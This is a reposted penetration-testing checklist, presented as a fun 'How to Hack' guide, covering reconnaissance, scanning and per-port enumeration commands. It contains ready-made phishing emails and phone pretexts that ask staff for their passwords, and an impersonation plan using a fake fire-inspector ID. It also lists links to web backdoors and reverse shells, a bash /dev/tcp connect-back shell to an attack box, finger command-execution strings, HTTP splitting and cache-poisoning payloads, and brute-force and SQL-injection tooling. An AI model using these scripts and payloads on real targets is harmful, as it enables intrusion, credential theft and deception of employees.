The process [How to Hack] By Kevin Orrey
This information is solely for guidance. Hacking is illegal.
This post is very well detailed with various terminologies, tools and patterns that anyone interested in hacking should be familiar with indeed. The preparation, process, and count down leading to an attack and various means of getting your targets ‘OWNED’. Also from the security point of view, we can see how these attacks can be prevented just by modifying the very techniques which a would be attacker might adopt.
Personally this is a lot of fun. So many things to learn from this post, especially for people who are looking to understand the long but precise process of penetrating, preventing and hacking of a computer or network infrastructure by remote or physical means. For more information visit the link below for related topics, links to tools, information on some relevant database and other educational and authoritative bodies
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
Enjoy The Post:
Changelog:
#
Major expansion Port 80
#
Minor alterations/ additions throughout
#
Port 3306 added – Input from Arvind Doraiswamy
#
Penetration Testing Framework 0.51
*
Pre-Inspection Visit – template User Link
*
Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
o full-1
Whois is widely used for querying authoritative registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targeting.
+
Authoritative Bodies
#
IANA - Internet Assigned Numbers Authority User Link
#
ICANN - Internet Corporation for Assigned Names and Numbers. User Link
#
NRO - Number Resource Organisation User Link
#
RIR - Regional Internet Registry
*
AFRINIC - African Network Information Centre User Link
*
APNIC - Asia Pacific Network Information Centre User Link
o
National Internet Registry
+
APJII User Link
+
CNNIC User Link
+
JPNIC User Link
+
KRNIC User Link
+
TWNIC User Link
+
VNNIC User Link
*
ARIN – American Registry for Internet Numbers User Link
*
LACNIC – Latin America & Caribbean Network Information Centre User Link
*
RIPE – Reseaux IP Européens—Network Coordination Centre User Link
+
Websites
#
DNS Stuff User Link
*
Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
#
Fixed Orbit User Link
*
Autonomous System lookups and other online tools available.
#
Geektools User Link
#
IP2Location User Link
*
Allows limited free IP lookups to be performed, displaying geolocation information, ISP details and other pertinent information.
#
Kartoo User Link
*
Metasearch engine that visually presents its results.
#
Maltego User Link
*
It is a great online resource for carrying out initial footprinting of your target network. It can be utilised in searching for the following: People, Groups of people (social networks), Companies, Organizations, Web sites, (including Domain and DNS details, Netblocks and IP addresses), Phrases, Affiliations, Documents and files
#
Netcraft User Link
*
Online search tool allowing queries for host information.
#
Robtex User Link
*
Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
#
Traceroute.org User Link
*
Website listing a large number links to online traceroute resources.
#
Wayback Machine User Link
*
Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
#
Central Ops User Link
*
Domain Dossier
*
Email Dossier
#
Whois.net User Link
+
Tools
#
Cheops-ng User Link
#
Country whois User Link
#
Domain Research Tool User Link
#
Firefox Plugins
*
AS Number User Link
*
Shazou User Link
*
Firecat Suite User Link
#
Gnetutil User Link
#
Goolag Scanner User Link
#
Greenwich User Link
#
Maltego User Link
#
GTWhois User Link
#
Sam Spade User Link
#
Smart whois User Link
#
SpiderFoot User Link
o full-2
Internet Search
+
General Information
#
Web Investigator User Link
#
Tracesmart User Link
#
Friends Reunited User Link
#
Ebay – profiles etc. User Link
+
Financial
#
EDGAR – Company information, including real-time filings. US User Link
#
Google Finance – General Finance Portal User Link
#
Hoovers – Business Intelligence, Insight and Results. US and UK User Link
#
Companies House UK User Link
#
Land Registry UK User Link
+
Phone book/ Electoral Role Information
#
411 – Online White Pages and Yellow Pages. US User Link
#
Abika – Background Check, Phone Number Lookup, Trace email, Criminal record, Find People, cell phone number search, License Plate Search. US User Link
#
Zabasearch – People Search Engine. US User Link
#
192.com – Electoral Role Search. UK User Link
#
BT.com. UK
*
Residential User Link
*
Business User Link
+
Code Search User Link
+
Google Hacking Database User Link
+
Generic Web Searching
#
Linked To
*
(See also Kartoo)
#
Linked From
*
(See also Kartoo)
#
Forum Entries
#
Email Addresses
#
Contact Details
#
GHDB Results
#
Newsgroups/forums
#
Back end files
*
.exe / .txt / .doc / .ppt / .pdf / .vbs / .pl /
.sh / .bat / .sql / .xls / .mdb / .conf
#
Metagoofil User Link
*
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
+
Social/ Business Networks
#
The following sites are some of many social and business realted networking entities that are in use today. This list is not exhaustive and has been limited to those with over 1 million members.
*
Africa
o
BlackPlanet User Link
*
Australia
o
Bebo User Link
*
Belgium
o
Netlog User Link
*
Holland
o
Hyves User Link
*
Hungary
o
iWiW User Link
*
Iran
o
Cloob User Link
*
Japan
o
Mixi User Link
*
Korea
o
CyWorld User Link
*
Poland
o
Grono User Link
o
Nasza-klasa User Link
*
Russia
o
Odnoklassniki User Link
o
Vkontakte User Link
*
Sweden
o
LunarStorm User Link
*
UK
o
FriendsReunited et al User Link
o
Badoo User Link
o
FaceParty User Link
*
US
o
Facebook User Link
o
MySpace User Link
o
Classmates User Link
o
Friendster User Link
*
Assorted
o
Linkedin User Link
o
Care2 User Link
o
Habbo User Link
o
Hi5 User Link
o
MocoSpace User Link
o
Orkut User Link
o
Passado User Link
o
Tagged User Link
o
Windows Live Spaces User Link
o
Yahoo! 360° User Link
o full-3
DNS Record Retrieval from publically available servers
+
Types of Information Records
#
SOA Records – Indicates the server that has authority for the domain.
#
MX Records – List of a host’s or domain’s mail exchanger server(s).
#
NS Records – List of a host’s or domain’s name server(s).
#
A Records – An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
#
PTR Records – Lists a host’s domain name, host identified by its IP address.
#
SRV Records – Service location record.
#
HINFO Records – Host information record with CPU type and operating system.
#
TXT Records – Generic text record.
#
CNAME – A host’s canonical name allows additional names/ aliases to be used to locate a computer.
#
RP – Responsible person for the domain.
+
Database Settings
#
Version.bind
#
Serial
#
Refresh
#
Retry
#
Expiry
#
Minimum
+
Sub Domains
+
Internal IP ranges
#
Reverse DNS for IP Range
+
Zone Transfer
o full-5
The following shows the most popular Social Engineering
+
Remote
#
Phone
*
Scenarios
o
IT Department.
“Hi, it’s Zoe from the helpdesk. I am doing a security audit of the network
and I need to re-synchronise the Active Directory usernames and passwords.
This is so that your logon process in the morning receives no undue delays”
If you are calling from a mobile number, explain that the helpdesk has been
issued a mobile phone for ‘on call’ personnel.
*
Results
*
Contact Details
o
Name
o
Phone number
o
Email
o
Room number
o
Department
o
Role
#
Email
*
Scenarios
o
Hi there, I am currently carrying out an Active Directory Health Check
for TARGET COMPANY and require to re-synchronise some outstanding
accounts on behalf of the IT Service Desk. Please reply to me
detailing the username and password you use to logon to your desktop
in the morning. I have checked with MR JOHN DOE, the IT Security
Advisor and he has authorised this request. I will then populate the
database with your account details ready for re-synchronisation with
Active Directory such that replication of your account will be
re-established (this process is transparent to the user and so
requires no further action from yourself). We hope that this exercise
will reduce the time it takes for some users to logon to the network.
Best Regards,
Andrew Marks
o
Good Morning,
The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.
If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this ‘opportunity’ to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.
If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.
We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.
Kindest regards,
lee
EMAIL SIGNATURE
*
Software
*
Results
*
Contact Details
o
Name
o
Phone number
o
Email
o
Room number
o
Department
o
Role
#
Other
+
Local
#
Personas
*
Name
o
Suggest same 1st name.
*
Phone
o
Give work mobile, but remember they have it!
*
Email
o
Have a suitable email address
*
Business Cards
o
Get cards printed
#
Contact Details
*
Name
*
Phone number
*
Email
*
Room number
*
Department
*
Role
#
Scenarios
*
New IT employee
o
New IT employee.
“Hi, I’m the new guy in IT and I’ve been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don’t they? Can you help me out on this?”
Get the following information, try to put a “any problems with it we can help with?” slant on it.
Username
Domain
Remote access (Type – Modem/VPN)
Remote email (OWA)
Most used software?
Any comments about the network?
Any additional software you would like?
What do you think about the security on the network? Password complexity etc.
Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure.
“Thanks very much and you’ll see the results on the company boards soon.”
*
Fire Inspector
o
Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace.
Ensure you have a suitable appearance – High visibility jacket – Clipboard – ID card (fake).
Check for:
number of fire extinguishers, pressure, type.
Fire exits, accessibility etc.
Look for any information you can get. Try to get on your own, without supervision!
#
Results
#
Maps
*
Satalitte Imagery
o
Google Maps
*
Building layouts
#
Other
o full-6
Dumpster Diving
+
Rubbish Bins
+
Contract Waste Removal
+
Ebay ex-stock sales i.e. HDD
o full-7
Web Site copy
+
htttrack User Link
+
teleport pro User Link
+
Black Widow User Link
*
Discovery & Probing. Enumeration can serve two distinct purposes in an assessment:
OS Fingerprinting
Remote applications being served.
OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand).
Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent.
Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS’s respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent.
Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
o
Default Port Lists
+
Windows User Link
+
*nix User Link
o
Enumeration tools and techniques – The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
+
General Enumeration Tools
#
nmap User Link
*
nmap -n -A -P0 -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
*
nmap -sU -P0 -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
*
nmap -sV -P0 -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
*
grep “appears to be up” nmap_saved_filename | awk -F( ‘{print $2}’ | awk -F) ‘{print $1}’ > ip_list
#
netcat User Link
*
o
nc -v -w 2 -z IP_Address port_range/port_number
*
nc -v -n IP_Address port
#
amap User Link
*
amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o ] [-D ] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i ] [target port [port] …]
*
amap -bqv 192.168.1.1 80
#
xprobe2 User Link
*
xprobe2 192.168.1.1
#
sinfp User Link
*
./sinfp.pl -i -p
#
nbtscan User Link
*
nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) |
()
Arrow Link
#
hping User Link
*
hping ip_address
#
scanrand User Link
*
scanrand ip_address:all
#
unicornscan User Link
*
unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
#
netenum User Link
*
netenum network/netmask timeout
#
fping User Link
*
fping -a -d hostname/ (Network/Subnet_Mask)
+
Firewall Specific Tools
#
firewalk User Link
*
firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
#
ftester User Link
*
host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
+
VOIP Specific Tools
#
SiVus User Link
#
sipsak User Link
*
Tracing paths: – sipsak -T -s sip:usernaem@domain
*
Options request:- sipsak -vv -s sip:username@domain
*
Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
#
smap User Link
*
smap IP_Address/Subnet_Mask
*
smap -o IP_Address/Subnet_Mask
*
smap -l IP_Address
#
Sipscan User Link
+
Default Passwords (Examine list) User Link
#
Passwords A User Link
#
Passwords B User Link
#
Passwords C User Link
#
Passwords D User Link
#
Passwords E User Link
#
Passwords F User Link
#
Passwords G User Link
#
Passwords H User Link
#
Passwords I User Link
#
Passwords J User Link
#
Passwords K User Link
#
Passwords L User Link
#
Passwords M User Link
#
Passwords N User Link
#
Passwords O User Link
#
Passwords P User Link
#
Passwords R User Link
#
Passwords S User Link
#
Passwords T User Link
#
Passwords U User Link
#
Passwords V User Link
#
Passwords W User Link
#
Passwords X User Link
#
Passwords Y User Link
#
Passwords Z User Link
#
Passwords (Numeric) User Link
o
Active Hosts
+
Open TCP Ports
+
Closed TCP Ports
+
Open UDP Ports
+
Closed UDP Ports
+
Service Probing
#
SMTP Mail Bouncing
#
Banner Grabbing
*
Other
*
HTTP
o
Commands
+
JUNK / HTTP/1.0
+
HEAD / HTTP/9.3
+
OPTIONS / HTTP/1.0
+
HEAD / HTTP/1.0
o
Extensions
+
WebDAV
+
ASP.NET
+
Frontpage
+
OWA
+
IIS ISAPI
+
PHP
+
OpenSSL
*
HTTPS
o
Use stunnel to encapsulate traffic.
*
SMTP
*
POP3
*
FTP
o
If banner altered, attempt anon logon and
execute: ‘quote help’ and ‘syst’ commands.
+
ICMP Responses
#
Type 3 (Port Unreachable)
#
Type 8 (Echo Request)
#
Type 13 (Timestamp Request)
#
Type 15 (Information Request)
#
Type 17 (Subnet Address Mask Request)
#
Responses from broadcast address
+
Source Port Scans
#
TCP/UDP 53 (DNS)
#
TCP 20 (FTP Data)
#
TCP 80 (HTTP)
#
TCP/UDP 88 (Kerberos)
+
Firewall Assessment
#
Firewalk
#
TCP/UDP/ICMP responses
+
OS Fingerprint
*
Enumeration
o
FTP port 21 open
+ full-1
Fingerprint server
#
telnet ip_address 21 (Banner grab)
#
Run command ftp ip_address
#
ftp@example.com
#
Check for anonymous access
*
ftp ip_address
Username: anonymous OR anon
Password: any@email.com
+ full-2
Password guessing
#
Hydra brute force User Link
#
medusa User Link
#
Brutus User Link
+ full-3
Examine configuration files
#
ftpusers
#
ftp.conf
#
proftpd.conf
+
MiTM
#
pasvagg.pl User Link
o
SSH port 22 open
+ full-1
Fingerprint server
# full-1
telnet ip_address 22 (banner grab)
# full-2
scanssh User Link
*
scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
+ full-2
Password guessing
# full-1
ssh root@ip_address
# full-2
guess-who User Link
*
./b -l username -h ip_address -p 22 -2 < password_file_location
# full-3
Hydra brute force User Link
# full-4
brutessh User Link
# full-5
Ruby SSH Bruteforcer User Link
+ full-3
Examine configuration files
#
ssh_config
#
sshd_config
#
authorized_keys
#
ssh_known_hosts
#
.shosts
+ full-5
SSH Client programs
#
tunnelier User Link
#
winsshd User Link
#
putty User Link
#
winscp User Link
o
Telnet port 23 open
+ full-1
Fingerprint server
# full-1
telnet ip_address
*
Common Banner List
OS / Banner
Solaris 8 / SunOS 5.8
Solaris 2.6 / SunOS 5.6
Solaris 2.4 or 2.5.1/ Unix(r) System V Release 4.0 (hostname)
SunOS 4.1.x / SunOS Unix (hostname)
FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
NetBSD / NetBSD/i386 (hostname) (ttyp1)
OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
Debian 3.0 / Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x / IRIX (hostname)
IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x or 4.3.x/ AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO / IPSO (hostname) (ttyp0)
Cisco IOS / User Access Verification
Livingston ComOS/ ComOS – Livingston PortMaster
# full-2
telnetfp User Link
+ full-2
Password Attack
# full-1
Common passwords
User Link
# full-2
Hydra brute force User Link
# full-3
Brutus User Link
#
telnet -l “-froot” hostname (Solaris 10+)
+ full-3
Examine configuration files
#
/etc/inetd.conf
#
/etc/xinetd.d/telnet
#
/etc/xinetd.d/stelnet
o
Sendmail Port 25 open
+ full-1
Fingerprint server
#
telnet ip_address 25 (banner grab)
+ full-2
Mail Server Testing
#
Enumerate users
*
VRFY username (verifies if username exists – enumeration of accounts)
*
EXPN username (verifies if username is valid – enumeration of accounts)
#
Mail Spoof Test
*
HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
#
Mail Relay Test
*
HELO anything
o
Identical to/from – mail from: rcpt to:
o
Unknown domain – mail from:
o
Domain not present – mail from:
o
Domain not supplied – mail from:
o
Source address omission – mail from: <> rcpt to:
o
Use IP address of target server – mail from: rcpt to:
o
Use double quotes – mail from: rcpt to: <”user@recipent-domain”>
o
User IP address of the target server – mail from: rcpt to:
o
Disparate formatting – mail from: rcpt to: <@domain:nobody@recipient-domain>
o
Disparate formatting2 – mail from: rcpt to:
+ full-3
Examine Configuration Files
#
sendmail.cf
#
submit.cf
o
DNS port 53 open
+ full-1
Fingerprint server/ service
#
host
*
host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ]
-v verbose format
-t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
-a Same as –t ANY.
-l Zone transfer (if allowed).
-f Save to a specified filename.
#
nslookup
*
nslookup [ -option ... ] [ host-to-find | - [ server ]]
#
dig
*
dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
#
whois
-h Use the named host to resolve the query
-a Use ARIN to resolve the query
-r Use RIPE to resolve the query
-p Use APNIC to resolve the query
-Q Perform a quick lookup
+ full-2
DNS Enumeration
#
Bile Suite User Link
*
perl BiLE.pl [website] [project_name]
*
perl BiLE-weigh.pl [website] [input file]
*
perl vet-IPrange.pl [input file] [true domain file] [output file]
*
perl vet-mx.pl [input file] [true domain file] [output file]
*
perl exp-tld.pl [input file] [output file]
*
perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
*
perl qtrace.pl [ip_address_file] [output_file]
*
perl jarf-rev [subnetblock] [nameserver]
#
txdns User Link
*
txdns -rt -t domain_name
*
txdns -x 50 -bb domain_name
*
txdns –verbose -fm wordlist.dic –server ip_address -rr SOA domain_name -h c: hostlist.txt
+ full-3
Examine Configuration Files
#
host.conf
#
resolv.conf
#
named.conf
o
TFTP port 69 open
+ full-1
TFTP Enumeration
#
tftp ip_address PUT local_file
#
tftp ip_address GET conf.txt (or other files)
#
Solarwinds TFTP server
#
tftp – i GET /etc/passwd (old Solaris)
+ full-2
TFTP Bruteforcing
#
TFTP bruteforcer User Link
#
Cisco-Torch User Link
o
Finger Port 79 open
+ full-1
User enumeration
#
finger ‘a b c d e f g h’ @example.com
#
finger admin@example.com
#
finger user@example.com
#
finger 0@example.com
#
finger .@example.com
#
finger **@example.com
#
finger test@example.com
#
finger @example.com
+ full-2
Command execution
#
finger “|/bin/id@example.com”
#
finger “|/bin/ls -a /@example.com”
+ full-3
Finger Bounce
#
finger user@host@victim
#
finger @internal@external
o
Web Ports 80, 8080 etc. open
+ full-1
Fingerprint server
#
Telnet ip_address port
#
Firefox plugins
*
All
o
firecat User Link
*
Specific
o
add n edit cookies User Link
o
asnumber User Link
o
header spy User Link
o
live http headers User Link
o
shazou User Link
o
web developer User Link
+ full-2
Crawl website
#
lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
#
httprint User Link
#
Metagoofil User Link
*
metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
+ full-3
Web Directory enumeration
#
Nikto User Link
*
nikto [-h target] [options]
#
DirBuster User Link
#
Wikto User Link
#
Goolag Scanner User Link
+ full-4
Vulnerability Assessment
#
Manual Tests
*
Default Passwords User Link
*
Install Backdoors
o
ASP
+
http://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
o
Assorted
+
http://michaeldaw.org/projects/web-backdoor-compilation/
+
http://open-labs.org/hacker_webkit02.tar.gz
o
Perl
+
http://home.arcor.de/mschierlm/test/pmsh.pl
+
http://pentestmonkey.net/tools/perl-reverse-shell/
+
http://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
o
PHP
+
http://php.spb.ru/remview/
+
http://pentestmonkey.net/tools/php-reverse-shell/
+
http://pentestmonkey.net/tools/php-findsock-shell/
o
Python
+
http://matahari.sourceforge.net/
o
TCL
+
http://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
o
Bash Connect Back Shell
+
GnuCitizen User Link
#
Atttack Box: nc -l -p Port -vvv
#
Victim: $ exec 5<>/dev/tcp/IP_Address/Port
Victim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
+
Neohapsis User Link
#
Atttack Box: nc -l -p Port -vvv
#
Victim: $ exec 0
Victim: $ exec 1>&0 # Next we copy stdin to stdout
Victim: $ exec 2>&0 # And finally stdin to stderr
Victim: $ exec /bin/sh 0&0 2>&0
*
Method Testing
o
nc IP_Adress Port
+
HEAD / HTTP/1.0
+
OPTIONS / HTTP/1.0
+
PROPFIND / HTTP/1.0
+
TRACE / HTTP/1.1
+
PUT http://Target_URL/FILE_NAME
+
POST http://Target_URL/FILE_NAME HTTP/1.x
*
Upload Files
o
curl
+
curl -u -T file_to_upload
+
curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)”
o
put.pl User Link
+
put.pl -h target -r /remote_file_name -f local_file_name
o
webdav
+
cadaver User Link
*
View Page Source
o
Hidden Values
o
Developer Remarks
o
Extraneous Code
o
Passwords!
*
Input Validation Checks User Link
o
NULL or null
+
Possible error messages returned.
o
‘ , ” , ; , +
Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
o
– , = , + , ”
+
Used to craft SQL Injection queries.
o
‘ , &, ! , ¦ , < , >
+
Used to find command execution vulnerabilities.
o
+
Basic Cross-Site Scripting Checks.
o
%0d%0a
+
Carriage Return (%0d) Line Feed (%0a)
#
HTTP Splitting
*
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here
o
i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47blah
#
Cache Poisoning
*
language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0aInsert undesireable content here
o
%7f , %ff
+
byte-length overflows; maximum 7- and 8-bit values.
o
-1, other
+
Integer and underflow vulnerabilities.
o
%n , %x , %s
+
Testing for format string vulnerabilities.
o
../
+
Directory Traversal Vulnerabilities.
o
% , _, *
+
Wildcard characters can sometimes present DoS issues or information disclosure.
o
Ax1024+
+
Overflow vulnerabilities.
*
Automated table and column iteration
o
orderby.py User Link
+
./orderby.py www.site.com/index.php?id=
o
d3sqlfuzz.py User Link
+
./d3sqlfuzz.py
www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE–
#
Generic Vulnerability Scanners
*
Acunetix User Link
*
NStealth User Link
*
Obiwan III User Link
*
w3af User Link
#
Specific Applications/ Server Tools
*
Domino
o
dominoaudit User Link
+
dominoaudit.pl [options] -h
*
Joomla
o
cms_few User Link
+
./cms.py
o
joomsq User Link
+
./joomsq.py
o
joomlascan User Link
+
./joomlascan.py [options i.e. -p/-proxy : Add proxy support -404 : Don't show 404 responses]
o
jscan User Link
+
jscan.pl -f hostname
+
(shell.txt required)
*
aspaudit.pl User Link
o
asp-audit.pl http://target/app/filename.aspx (options i.e. -bf)
*
Vbulletin
o
vbscan.py User Link
+
vbscan.py
-v
+
vbscan.py -update
*
ZyXel
o
zyxel-bf.sh User Link
o
snmpwalk
+
snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
o
snmpget
+
snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
+ full-5
Proxy Testing
#
Burpsuite User Link
#
Crowbar User Link
#
Interceptor User Link
#
Paros User Link
#
Requester Raw User Link
#
Suru User Link
#
WebScarab User Link
+ full-6
Examine configuration files
#
Generic
*
Examine httpd.conf/ windows config files
#
JBoss User Link
*
JMX Console http://:8080/jmxconcole/
o
War File User Link
#
Joomla
*
configuration.php
*
diagnostics.php
*
joomla.inc.php
*
config.inc.php
#
Mambo
*
configuration.php
*
config.inc.php
#
Wordpress
*
setup-config.php
*
wp-config.php
#
ZyXel User Link
*
/WAN.html (contains PPPoE ISP password)
*
/WLAN_General.html and /WLAN.html (contains WEP key)
*
/rpDyDNS.html (contains DDNS credentials)
*
/Firewall_DefPolicy.html (Firewall)
*
/CF_Keyword.html (Content Filter)
*
/RemMagWWW.html (Remote MGMT)
*
/rpSysAdmin.html (System)
*
/LAN_IP.html (LAN)
*
/NAT_General.html (NAT)
*
/ViewLog.html (Logs)
*
/rpFWUpload.html (Tools)
*
/DiagGeneral.html (Diagnostic)
*
/RemMagSNMP.html (SNMP Passwords)
*
/LAN_ClientList.html (Current DHCP Leases)
*
Config Backups
o
/RestoreCfg.html
o
/BackupCfg.html
o
Note: – The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
+
ZyXEL Config Reader User Link
+ full-7
Examine web server logs
#
c:winntsystem32LogfilesW3SVC1
*
awk -F ” ” ‘{print $3,$11} filename | sort | uniq
+
References
#
White Papers
*
Cross Site Request Forgery: An Introduction to a Common Web Application Weakness User Link
*
Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity User Link
*
Blind Security Testing – An Evolutionary Approach User Link
*
Command Injection in XML Signatures and Encryption User Link
*
Input Validation Cheat Sheet User Link
*
SQL Injection Cheat Sheet User Link
#
Books
*
Hacking Exposed Web 2.0 User Link
*
Hacking Exposed Web Applications User Link
*
The Web Application Hacker’s Handbook User Link
+
Exploit Frameworks
#
Brute-force Tools
*
Acunetix User Link
#
Metasploit User Link
#
w3af User Link
o
Portmapper port 111 open
+
rpcdump.py User Link
#
rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
+
rpcinfo
#
rpcinfo [options] IP_Address
o
NTP Port 123 open
+ full-1
NTP Enumeration
# full-1
ntpdc -c monlist IP_ADDRESS
# full-2
ntpdc -c sysinfo IP_ADDRESS
# full-3
ntpq
*
host
*
hostname
*
ntpversion
*
readlist
*
version
+ full-2
Examine configuration files
#
ntp.conf
o
NetBIOS Ports 135-139,445 open
+ full-1
NetBIOS enumeration
#
Enum User Link
*
enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile>
#
Null Session
*
net use 192.168.1.1ipc$ “” /u:”"
o
net view ip_address
o
Dumpsec User Link
#
Smbclient
*
smbclient -L //server/share password options
#
Superscan User Link
*
Enumeration tab.
#
user2sid/sid2user User Link
#
Winfo User Link
+ full-2
NetBIOS brute force
#
Hydra User Link
#
Brutus User Link
#
Cain & Abel User Link
#
getacct User Link
#
NAT (NetBIOS Auditing Tool) User Link
+ full-3
Examine Configuration Files
#
Smb.conf
#
lmhosts
o
SNMP port 161 open
+ full-1
Default Community Strings
#
public
#
private
#
cisco
*
cable-docsis
*
ILMI
+ full-2
MIB enumeration
#
Windows NT
*
.1.3.6.1.2.1.1.5 Hostnames
*
.1.3.6.1.4.1.77.1.4.2 Domain Name
*
.1.3.6.1.4.1.77.1.2.25 Usernames
*
.1.3.6.1.4.1.77.1.2.3.1.1 Running Services
*
.1.3.6.1.4.1.77.1.2.27 Share Information
#
Solarwinds MIB walk User Link
#
Getif User Link
#
snmpwalk
*
snmpwalk -v -c
#
Snscan User Link
#
Applications
*
ZyXel
o
snmpget -v2c -c 1.3.6.1.4.1.890.1.2.1.2.6.0
o
snmpwalk -v2c -c 1.3.6.1.4.1.890.1.2.1.2
+ full-3
SNMP Bruteforce
#
onesixtyone
*
onesixytone -c SNMP.wordlist
#
cat
*
./cat -h -w SNMP.wordlist
#
Solarwinds SNMP Brute Force User Link
#
ADMsnmp User Link
+ full-4
Examine SNMP Configuration files
#
snmp.conf
#
snmpd.conf
#
snmp-config.xml
o
LDAP Port 389 Open
+ full-1
ldap enumeration
#
ldapminer User Link
*
ldapminer -h ip_address -p port (not required if default) -d
#
luma User Link
*
Gui based tool
#
ldp User Link
*
Gui based tool
#
openldap User Link
*
ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
*
ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
*
ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
*
